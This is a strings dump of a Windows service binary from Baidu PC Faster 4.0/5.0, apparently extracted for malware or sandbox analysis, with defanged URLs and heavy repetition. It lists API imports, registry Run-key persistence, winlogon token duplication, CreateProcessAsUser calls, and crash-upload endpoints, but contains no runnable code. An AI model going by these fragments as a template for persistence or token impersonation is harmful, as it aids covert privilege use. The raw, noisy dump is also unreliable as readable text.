s:\app\gensoft\security-client\pc-faster\public\output\pdb\PCFasterSvc.pdb
DataReport.dll
DataReport.dll
log2.dll
log2.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeW
CreateNamedPipeW
ConnectNamedPipe
ConnectNamedPipe
WaitNamedPipeW
WaitNamedPipeW
SetNamedPipeHandleState
SetNamedPipeHandleState
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
UnhookWindowsHookEx
UnhookWindowsHookEx
GetKeyState
GetKeyState
SetWindowsHookExW
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegOpenKeyW
RegOpenKeyW
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
OLEAUT32.dll
OLEAUT32.dll
SHDeleteKeyW
SHDeleteKeyW
SHLWAPI.dll
SHLWAPI.dll
VERSION.dll
VERSION.dll
WTSAPI32.dll
WTSAPI32.dll
USERENV.dll
USERENV.dll
OLEACC.dll
OLEACC.dll
PSAPI.DLL
PSAPI.DLL
.PAVCOleException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
zcÃ
zcÃ
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
.?AVBugReportHelper@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCRegKey@ATL@@
.?AVCRegKey@ATL@@
.?AVCMyRegKeyBase@@
.?AVCMyRegKeyBase@@
.?AVCMyRegKey32@@
.?AVCMyRegKey32@@
.?AUKrnMsg@Msg@KRN_UI_protocol@@
.?AUKrnMsg@Msg@KRN_UI_protocol@@
.PAVCException@@
.PAVCException@@
.?AUPIPEINST2@@
.?AUPIPEINST2@@
.eYB>
.eYB>
:.UTT$
:.UTT$
\.CD9D
\.CD9D
"""%####
"""%####
@@@#@@@%@@@%@@@#@@@
@@@#@@@%@@@%@@@#@@@
"""%%%%!
"""%%%%!
@@@!@@@%@@@%@@@!@@@
@@@!@@@%@@@%@@@!@@@
9Ÿ9K9l9
9Ÿ9K9l9
6$6(6,606
6$6(6,606
3.44484
3.44484
4_5K5f5{5
4_5K5f5{5
;$;7;&
;$;7;&
3!31373?3
3!31373?3
> ?$?(?,?0?4?
> ?$?(?,?0?4?
> >$>(>,>0>
> >$>(>,>0>
7%7 767;7}7
7%7 767;7}7
566C6n6%7X7
566C6n6%7X7
:$:,:8:\:|:
:$:,:8:\:|:
C%s (%s:%d)
C%s (%s:%d)
%s (%s:%d)
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Ccomctl32.dll
Ccomctl32.dll
Ccomdlg32.dll
Ccomdlg32.dll
Cshell32.dll
Cshell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
ole32.dll
accKeyboardShortcut
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
commctrl_DragListMsg
ntdll.dll
ntdll.dll
KERNEL32.DLL
KERNEL32.DLL
explorer.exe
explorer.exe
HTTP/1.1
HTTP/1.1
BugReportConfig.ini
BugReportConfig.ini
ShowBugReport
ShowBugReport
DumpConfig.ini
DumpConfig.ini
_ServerStore.dat
_ServerStore.dat
hXXp://
hXXp://
product=%s;guid=%s;type=%d;
product=%s;guid=%s;type=%d;
/cgi-bin-py/dump_controler.cgi
/cgi-bin-py/dump_controler.cgi
CrashUL.exe
CrashUL.exe
trayreported
trayreported
/Start:%s /Program:%s /Path:%s /Version:%s /Module:%s /App:%s /ID:%s /Email:%s /DumpPath:%s
/Start:%s /Program:%s /Path:%s /Version:%s /Module:%s /App:%s /ID:%s /Email:%s /DumpPath:%s
serverreported
serverreported
\StringFileInfo\xx\%s
\StringFileInfo\xx\%s
BugReportConfig
BugReportConfig
BugInfoUploadURL
BugInfoUploadURL
hXXp://sync.bav.baidu.com
hXXp://sync.bav.baidu.com
BugURL
BugURL
hXXp://bug.bav.baidu.com
hXXp://bug.bav.baidu.com
Baidu Crash Report
Baidu Crash Report
CrashCallBackExe
CrashCallBackExe
c:\crash.ini
c:\crash.ini
CrashReport.exe
CrashReport.exe
\StringFileInfo\x\%s
\StringFileInfo\x\%s
\StringFileInfo\X
\StringFileInfo\X
PatchExportTable
PatchExportTable
FPatchMyImportTables
FPatchMyImportTables
%S$%x
%S$%x
public %s
public %s
sub_%0X
sub_%0X
%sloc_%0X
%sloc_%0X
loc_%0X:
loc_%0X:
push %seg
push %seg
pop %seg
pop %seg
setÌ
setÌ
cmovÌ
cmovÌ
66006666
66006666
xmm%d
xmm%d
st(%d)
st(%d)
%s (%0Xh)
%s (%0Xh)
%0Xh
%0Xh
-%0Xh
-%0Xh
%s:%s
%s:%s
%0Xh:%0Xh
%0Xh:%0Xh
%0Xh, %0Xh
%0Xh, %0Xh
BAD ptr %s
BAD ptr %s
oword ptr %s
oword ptr %s
tbyte ptr %s
tbyte ptr %s
qword ptr %s
qword ptr %s
dword ptr %s
dword ptr %s
word ptr %s
word ptr %s
byte ptr %s
byte ptr %s
d-d-d d:d:d
d-d-d d:d:d
Unknown error X
Unknown error X
user_plugin_chrome_list
user_plugin_chrome_list
user_plugin_firefox_list
user_plugin_firefox_list
dir.ini
dir.ini
\Baidu Security\PC Faster\4.0.0.0
\Baidu Security\PC Faster\4.0.0.0
url.ini
url.ini
%d:%d,%d:%d
%d:%d,%d:%d
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
PCFaster.exe
PCFaster.exe
\sysconfig.ini
\sysconfig.ini
config.ini
config.ini
MainExeName
MainExeName
C:\Users\Public\Documents\Baidu Security\PC Faster\4.0.0.0
C:\Users\Public\Documents\Baidu Security\PC Faster\4.0.0.0
"%s" %s
"%s" %s
Sensapi.dll
Sensapi.dll
BugReporter.exe
BugReporter.exe
failed to GetModuleFileName: 0x%x
failed to GetModuleFileName: 0x%x
[ClientAgent2] create window %s
[ClientAgent2] create window %s
lastError: %d
lastError: %d
(id: %d,name:%S),
(id: %d,name:%S),
[ClientAgent2] (id:%d name:%S)
[ClientAgent2] (id:%d name:%S)
(id:%d name:%S),
(id:%d name:%S),
[ClientBackground2] IPCMessage (ID:%d name:%S)
[ClientBackground2] IPCMessage (ID:%d name:%S)
[ClientBackground2] DisconnectNamedPipe
[ClientBackground2] DisconnectNamedPipe
:0x%x
:0x%x
[ClientBackground2] SetNamedPipeHandleState
[ClientBackground2] SetNamedPipeHandleState
[IPC] Readfile from server pipe failed. Errorcode: %d.
[IPC] Readfile from server pipe failed. Errorcode: %d.
[ServerAgent2] create window %s
[ServerAgent2] create window %s
CreateNamedPipe
CreateNamedPipe
LastError [%d]
LastError [%d]
intrusive_ptr_add_ref : %S %d
intrusive_ptr_add_ref : %S %d
[ClientBackground] DisconnectNamedPipe
[ClientBackground] DisconnectNamedPipe
[IPC] Readfile from client pipe failed. Errorcode: %d.
[IPC] Readfile from client pipe failed. Errorcode: %d.
[ipcChannel] found no channel of this type:%d
[ipcChannel] found no channel of this type:%d
[ipcChannel::GetPipeHandle]
[ipcChannel::GetPipeHandle]
ClientBackground, pipe:%s, channel:%s
ClientBackground, pipe:%s, channel:%s
\\.\Pipe\%s
\\.\Pipe\%s
COMM_FUNC::GetAppDataDir, user_info::UniqueUserID::GetActiveDesktopToken()=%u
COMM_FUNC::GetAppDataDir, user_info::UniqueUserID::GetActiveDesktopToken()=%u
COMM_FUNC::GetAppDataDir, SHGetFolderPath(%d)=%u
COMM_FUNC::GetAppDataDir, SHGetFolderPath(%d)=%u
COMM_FUNC::GetAppDataDir, SHGetSpecialFolderPath(%d)
COMM_FUNC::GetAppDataDir, SHGetSpecialFolderPath(%d)
Updater.exe
Updater.exe
"%s" -no_ui
"%s" -no_ui
LookupPrivilegeValue error: %u
LookupPrivilegeValue error: %u
AdjustTokenPrivileges error: %u
AdjustTokenPrivileges error: %u
user name: %s, domain: %s
user name: %s, domain: %s
WTSEnumerateSessions failed, error code:%u
WTSEnumerateSessions failed, error code:%u
WTSEnumerateSessions OK, %u sessions
WTSEnumerateSessions OK, %u sessions
%dth session: %s, id:%d, state:%d
%dth session: %s, id:%d, state:%d
OnSessionLogon, session id: %d
OnSessionLogon, session id: %d
OnSessionLogoff, session id: %d
OnSessionLogoff, session id: %d
OnSessionConnect, session id: %d
OnSessionConnect, session id: %d
StartAppForUser: %s, thread id: %u
StartAppForUser: %s, thread id: %u
CreateEnvironmentBlock failed, error code: %u, thread id: %u
CreateEnvironmentBlock failed, error code: %u, thread id: %u
CreateProcessAsUser for %s is OK., thread id: %u
CreateProcessAsUser for %s is OK., thread id: %u
CreateProcessAsUser failed, error code: %u, thread id: %u
CreateProcessAsUser failed, error code: %u, thread id: %u
Enter StartAppForActiveUser, thread id: %u
Enter StartAppForActiveUser, thread id: %u
Before WTSQueryUserToken, thread id: %u
Before WTSQueryUserToken, thread id: %u
QueryUserToken failed, error code: %u, thread id: %u
QueryUserToken failed, error code: %u, thread id: %u
GetTokenInformation failed, error code: %u, thread id: %u
GetTokenInformation failed, error code: %u, thread id: %u
StartAppForActiveUser: %s, thread id: %u
StartAppForActiveUser: %s, thread id: %u
LogReporter.exe
LogReporter.exe
"%s" -show_ui -launch_uac_app %s
"%s" -show_ui -launch_uac_app %s
"%s" -launch_uac_app %s
"%s" -launch_uac_app %s
Leave StartAppForActiveUser, thread id: %u
Leave StartAppForActiveUser, thread id: %u
"%s" found, session id: %u, process id: %u
"%s" found, session id: %u, process id: %u
CreateEnvironmentBlock Failed: %u
CreateEnvironmentBlock Failed: %u
CreateProcessAsUser Failed, error code: %u
CreateProcessAsUser Failed, error code: %u
OnShutdown, thread id: %u
OnShutdown, thread id: %u
OnInit, thread id: %u
OnInit, thread id: %u
WTSEnumerateSessions failed, error code: %u
WTSEnumerateSessions failed, error code: %u
winlogon.exe
winlogon.exe
Process token open Error: %u
Process token open Error: %u
DuplicateTokenEx Error: %u
DuplicateTokenEx Error: %u
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
%s -bhips %d %d %d
%s -bhips %d %d %d
\PcfPopups.exe
\PcfPopups.exe
-ieprotectDlg %d %d "%s"
-ieprotectDlg %d %d "%s"
-homepageDlg %d "%s"
-homepageDlg %d "%s"
OnHipsMessage: Unknown dwMid: %d
OnHipsMessage: Unknown dwMid: %d
OnHipsMessage: %s
OnHipsMessage: %s
OnHipsMessage: returning result from cache: %d
OnHipsMessage: returning result from cache: %d
OnHipsMessage: returning result from temp cache: %d
OnHipsMessage: returning result from temp cache: %d
%s %s
%s %s
OnHipsMessage: CreateProcessForActiveUsers failed: %d
OnHipsMessage: CreateProcessForActiveUsers failed: %d
OnHipsMessage: popup result: %d
OnHipsMessage: popup result: %d
\BHips.dll
\BHips.dll
HKEY_LOCAL_MACHINE\SYSTEM\*ControlSet*\services\PCFasterSvc_{PCFaster_4.0.0.0}
HKEY_LOCAL_MACHINE\SYSTEM\*ControlSet*\services\PCFasterSvc_{PCFaster_4.0.0.0}
HKEY_CURRENT_USER\SOFTWARE\Baidu Security\PC Faster
HKEY_CURRENT_USER\SOFTWARE\Baidu Security\PC Faster
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu Security\PC Faster
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu Security\PC Faster
HKEY_CURRENT_USER\SOFTWARE\Baidu Security\PC Faster\4.0.0.0
HKEY_CURRENT_USER\SOFTWARE\Baidu Security\PC Faster\4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu Security\PC Faster\4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu Security\PC Faster\4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Baidu PC Faster 4.0.0.0
Baidu PC Faster 4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu_Drp_pos
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu_Drp_pos
BHips_RegisterCallback: %u(%s)
BHips_RegisterCallback: %u(%s)
FasterNow.exe
FasterNow.exe
EnableSelfProtection failed: (%X) %s
EnableSelfProtection failed: (%X) %s
ftex.exe
ftex.exe
DisbleSelfProtection failed: (%X) %s
DisbleSelfProtection failed: (%X) %s
LiveUpdate.exe
LiveUpdate.exe
PCFTray.exe
PCFTray.exe
PCFPopups.exe
PCFPopups.exe
PCFasterSvc.exe
PCFasterSvc.exe
SysOptEngineSvc.exe
SysOptEngineSvc.exe
SysAndNetworkOptSvc.exe
SysAndNetworkOptSvc.exe
SysRepairSvc.exe
SysRepairSvc.exe
PluginRemoverSvc.exe
PluginRemoverSvc.exe
LeakRepairSvc.exe
LeakRepairSvc.exe
LeakRepair.exe
LeakRepair.exe
CleanerEngineSvc.exe
CleanerEngineSvc.exe
CreateWindow failed: %s
CreateWindow failed: %s
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
CMyRegKeyBase::Open, m_mapRegKey.find(%s)
CMyRegKeyBase::Open, m_mapRegKey.find(%s)
CMyRegKeyBase::EqualType, m_mapRegType.find(%s)
CMyRegKeyBase::EqualType, m_mapRegType.find(%s)
CMsgRouteMgr::InitMgr : Load Component %s
CMsgRouteMgr::InitMgr : Load Component %s
Global\{D1832A89-8FD1-8e20-A871-578A717C7536}_{PCFaster_4.0.0.0}
Global\{D1832A89-8FD1-8e20-A871-578A717C7536}_{PCFaster_4.0.0.0}
CMsgRouteMgr::InitMgr : InitIPCServer
CMsgRouteMgr::InitMgr : InitIPCServer
Svc.exe
Svc.exe
PluginConfig.xml
PluginConfig.xml
PluginConfig.xml
PluginConfig.xml
Unload component: %s
Unload component: %s
Load component %s successfully!
Load component %s successfully!
Can not unload component %s because the done function returns EXEC_ERROR!
Can not unload component %s because the done function returns EXEC_ERROR!
Force to unload component %s even done function returns EXEC_ERROR!
Force to unload component %s even done function returns EXEC_ERROR!
CMsgRouteMgr::QueryInterface :
CMsgRouteMgr::QueryInterface :
CMsgRouteMgr::DispatchMsg :
CMsgRouteMgr::DispatchMsg :
strCMDID
strCMDID
CMsgRouteMgr::QueryInfByCmdID :
CMsgRouteMgr::QueryInfByCmdID :
bd_krn_ui_D3152864-5AFF-42e3-9FB2-99ABF218961_{PCFaster_4.0.0.0}
bd_krn_ui_D3152864-5AFF-42e3-9FB2-99ABF218961_{PCFaster_4.0.0.0}
%s.dll
%s.dll
CMsgRouteMgr::DoWork
CMsgRouteMgr::DoWork
DumpReportInterval
DumpReportInterval
-send_uu_msg
-send_uu_msg
-no_ui -send_uu_msg
-no_ui -send_uu_msg
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\Statistic
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\Statistic
UpLoadReportErrorDmp
UpLoadReportErrorDmp
PCFHelper.exe
PCFHelper.exe
-svc_dowork=%d
-svc_dowork=%d
com_ui_shellexecute
com_ui_shellexecute
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Receive unknown init msg
Receive unknown init msg
Send kernel response to process: %s error!
Send kernel response to process: %s error!
Global\BDKERNELPROTECTOR_{PCFaster_4.0.0.0}
Global\BDKERNELPROTECTOR_{PCFaster_4.0.0.0}
Baidu PC Faster 5.0.0.0
Baidu PC Faster 5.0.0.0
Baidu PC Faster Service 4.0.0.0
Baidu PC Faster Service 4.0.0.0
PCFasterSvc_{PCFaster_4.0.0.0}
PCFasterSvc_{PCFaster_4.0.0.0}
%u.u.u.u
%u.u.u.u
version.xml
version.xml
Uninstall.exe
Uninstall.exe
ReportURL
ReportURL
DataReport
DataReport
%u.%u.%u.%u
%u.%u.%u.%u
Bexplorer.exe
Bexplorer.exe
COMM_FUNC::GetExplorerToken: explorer.exe found!
COMM_FUNC::GetExplorerToken: explorer.exe found!
COMM_FUNC::GetExplorerToken: OpenProcess failed: %d
COMM_FUNC::GetExplorerToken: OpenProcess failed: %d
COMM_FUNC::GetExplorerToken: OpenProcessToken failed: %d
COMM_FUNC::GetExplorerToken: OpenProcessToken failed: %d
CHelper::RunExeInSvc, CreateProcess(%s), pi.hProcess=%u
CHelper::RunExeInSvc, CreateProcess(%s), pi.hProcess=%u
@[ServerBackground] PIPEINST
@[ServerBackground] PIPEINST
[ServerBackground] PIPEINST
[ServerBackground] PIPEINST
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFasterSvc.exe
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFasterSvc.exe
%Program Files%\Baidu Security\PC Faster\5.0.0.0\
%Program Files%\Baidu Security\PC Faster\5.0.0.0\
5.0.4.87531
5.0.4.87531
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump
5.1.2600.5512 (xpsp.080413-211
5.1.2600.5512 (xpsp.080413-211
5,0,4,87456
5,0,4,87456
SysOptEngineSvc.exe_1724:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
CNotSupportedException
CNotSupportedException
hhctrl.ocx
hhctrl.ocx
CCmdTarget
CCmdTarget
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
%s$x$x
%s$x$x
%s$%x
%s$%x
mscoree.dll
mscoree.dll
coredll.dll
coredll.dll
-60%!<:>
-60%!<:>
$x
$x
;3:'84!<:>
;3:'84!<:>
6666666666666666
6666666666666666
BHips.dll
BHips.dll
Thread %d: invalid start address X!!!
Thread %d: invalid start address X!!!
%d: BaseThreadStart = X
%d: BaseThreadStart = X
kernel32.dll
kernel32.dll
message %d, %X, %X, %X
message %d, %X, %X, %X
KrnMsg
KrnMsg
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
00000000
00000000
s:\app\gensoft\security-client\pc-faster\public\output\pdb\PCFasterSvc.pdb
s:\app\gensoft\security-client\pc-faster\public\output\pdb\PCFasterSvc.pdb
DataReport.dll
DataReport.dll
log2.dll
log2.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeW
CreateNamedPipeW
ConnectNamedPipe
ConnectNamedPipe
WaitNamedPipeW
WaitNamedPipeW
SetNamedPipeHandleState
SetNamedPipeHandleState
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
UnhookWindowsHookEx
UnhookWindowsHookEx
GetKeyState
GetKeyState
SetWindowsHookExW
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegOpenKeyW
RegOpenKeyW
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
OLEAUT32.dll
OLEAUT32.dll
SHDeleteKeyW
SHDeleteKeyW
SHLWAPI.dll
SHLWAPI.dll
VERSION.dll
VERSION.dll
WTSAPI32.dll
WTSAPI32.dll
USERENV.dll
USERENV.dll
OLEACC.dll
OLEACC.dll
PSAPI.DLL
PSAPI.DLL
.PAVCOleException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
zcÃ
zcÃ
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
.?AVBugReportHelper@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCRegKey@ATL@@
.?AVCRegKey@ATL@@
.?AVCMyRegKeyBase@@
.?AVCMyRegKeyBase@@
.?AVCMyRegKey32@@
.?AVCMyRegKey32@@
.?AUKrnMsg@Msg@KRN_UI_protocol@@
.?AUKrnMsg@Msg@KRN_UI_protocol@@
.PAVCException@@
.PAVCException@@
.?AUPIPEINST2@@
.?AUPIPEINST2@@
.eYB>
.eYB>
:.UTT$
:.UTT$
\.CD9D
\.CD9D
"""%####
"""%####
@@@#@@@%@@@%@@@#@@@
@@@#@@@%@@@%@@@#@@@
"""%%%%!
"""%%%%!
@@@!@@@%@@@%@@@!@@@
@@@!@@@%@@@%@@@!@@@
9Ÿ9K9l9
9Ÿ9K9l9
6$6(6,606
6$6(6,606
3.44484
3.44484
4_5K5f5{5
4_5K5f5{5
;$;7;&
;$;7;&
3!31373?3
3!31373?3
> ?$?(?,?0?4?
> ?$?(?,?0?4?
> >$>(>,>0>
> >$>(>,>0>
7%7 767;7}7
7%7 767;7}7
566C6n6%7X7
566C6n6%7X7
:$:,:8:\:|:
:$:,:8:\:|:
C%s (%s:%d)
C%s (%s:%d)
%s (%s:%d)
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Ccomctl32.dll
Ccomctl32.dll
Ccomdlg32.dll
Ccomdlg32.dll
Cshell32.dll
Cshell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
ole32.dll
accKeyboardShortcut
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
commctrl_DragListMsg
ntdll.dll
ntdll.dll
KERNEL32.DLL
KERNEL32.DLL
explorer.exe
explorer.exe
HTTP/1.1
HTTP/1.1
BugReportConfig.ini
BugReportConfig.ini
ShowBugReport
ShowBugReport
DumpConfig.ini
DumpConfig.ini
_ServerStore.dat
_ServerStore.dat
hXXp://
hXXp://
product=%s;guid=%s;type=%d;
product=%s;guid=%s;type=%d;
/cgi-bin-py/dump_controler.cgi
/cgi-bin-py/dump_controler.cgi
CrashUL.exe
CrashUL.exe
trayreported
trayreported
/Start:%s /Program:%s /Path:%s /Version:%s /Module:%s /App:%s /ID:%s /Email:%s /DumpPath:%s
/Start:%s /Program:%s /Path:%s /Version:%s /Module:%s /App:%s /ID:%s /Email:%s /DumpPath:%s
serverreported
serverreported
\StringFileInfo\xx\%s
\StringFileInfo\xx\%s
BugReportConfig
BugReportConfig
BugInfoUploadURL
BugInfoUploadURL
hXXp://sync.bav.baidu.com
hXXp://sync.bav.baidu.com
BugURL
BugURL
hXXp://bug.bav.baidu.com
hXXp://bug.bav.baidu.com
Baidu Crash Report
Baidu Crash Report
CrashCallBackExe
CrashCallBackExe
c:\crash.ini
c:\crash.ini
CrashReport.exe
CrashReport.exe
\StringFileInfo\x\%s
\StringFileInfo\x\%s
\StringFileInfo\X
\StringFileInfo\X
PatchExportTable
PatchExportTable
FPatchMyImportTables
FPatchMyImportTables
%S$%x
%S$%x
public %s
public %s
sub_%0X
sub_%0X
%sloc_%0X
%sloc_%0X
loc_%0X:
loc_%0X:
push %seg
push %seg
pop %seg
pop %seg
setÌ
setÌ
cmovÌ
cmovÌ
66006666
66006666
xmm%d
xmm%d
st(%d)
st(%d)
%s (%0Xh)
%s (%0Xh)
%0Xh
%0Xh
-%0Xh
-%0Xh
%s:%s
%s:%s
%0Xh:%0Xh
%0Xh:%0Xh
%0Xh, %0Xh
%0Xh, %0Xh
BAD ptr %s
BAD ptr %s
oword ptr %s
oword ptr %s
tbyte ptr %s
tbyte ptr %s
qword ptr %s
qword ptr %s
dword ptr %s
dword ptr %s
word ptr %s
word ptr %s
byte ptr %s
byte ptr %s
d-d-d d:d:d
d-d-d d:d:d
Unknown error X
Unknown error X
user_plugin_chrome_list
user_plugin_chrome_list
user_plugin_firefox_list
user_plugin_firefox_list
dir.ini
dir.ini
\Baidu Security\PC Faster\4.0.0.0
\Baidu Security\PC Faster\4.0.0.0
url.ini
url.ini
%d:%d,%d:%d
%d:%d,%d:%d
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
PCFaster.exe
PCFaster.exe
\sysconfig.ini
\sysconfig.ini
config.ini
config.ini
MainExeName
MainExeName
C:\Users\Public\Documents\Baidu Security\PC Faster\4.0.0.0
C:\Users\Public\Documents\Baidu Security\PC Faster\4.0.0.0
"%s" %s
"%s" %s
Sensapi.dll
Sensapi.dll
BugReporter.exe
BugReporter.exe
failed to GetModuleFileName: 0x%x
failed to GetModuleFileName: 0x%x
[ClientAgent2] create window %s
[ClientAgent2] create window %s
lastError: %d
lastError: %d
(id: %d,name:%S),
(id: %d,name:%S),
[ClientAgent2] (id:%d name:%S)
[ClientAgent2] (id:%d name:%S)
(id:%d name:%S),
(id:%d name:%S),
[ClientBackground2] IPCMessage (ID:%d name:%S)
[ClientBackground2] IPCMessage (ID:%d name:%S)
[ClientBackground2] DisconnectNamedPipe
[ClientBackground2] DisconnectNamedPipe
:0x%x
:0x%x
[ClientBackground2] SetNamedPipeHandleState
[ClientBackground2] SetNamedPipeHandleState
[IPC] Readfile from server pipe failed. Errorcode: %d.
[IPC] Readfile from server pipe failed. Errorcode: %d.
[ServerAgent2] create window %s
[ServerAgent2] create window %s
CreateNamedPipe
CreateNamedPipe
LastError [%d]
LastError [%d]
intrusive_ptr_add_ref : %S %d
intrusive_ptr_add_ref : %S %d
[ClientBackground] DisconnectNamedPipe
[ClientBackground] DisconnectNamedPipe
[IPC] Readfile from client pipe failed. Errorcode: %d.
[IPC] Readfile from client pipe failed. Errorcode: %d.
[ipcChannel] found no channel of this type:%d
[ipcChannel] found no channel of this type:%d
[ipcChannel::GetPipeHandle]
[ipcChannel::GetPipeHandle]
ClientBackground, pipe:%s, channel:%s
ClientBackground, pipe:%s, channel:%s
\\.\Pipe\%s
\\.\Pipe\%s
COMM_FUNC::GetAppDataDir, user_info::UniqueUserID::GetActiveDesktopToken()=%u
COMM_FUNC::GetAppDataDir, user_info::UniqueUserID::GetActiveDesktopToken()=%u
COMM_FUNC::GetAppDataDir, SHGetFolderPath(%d)=%u
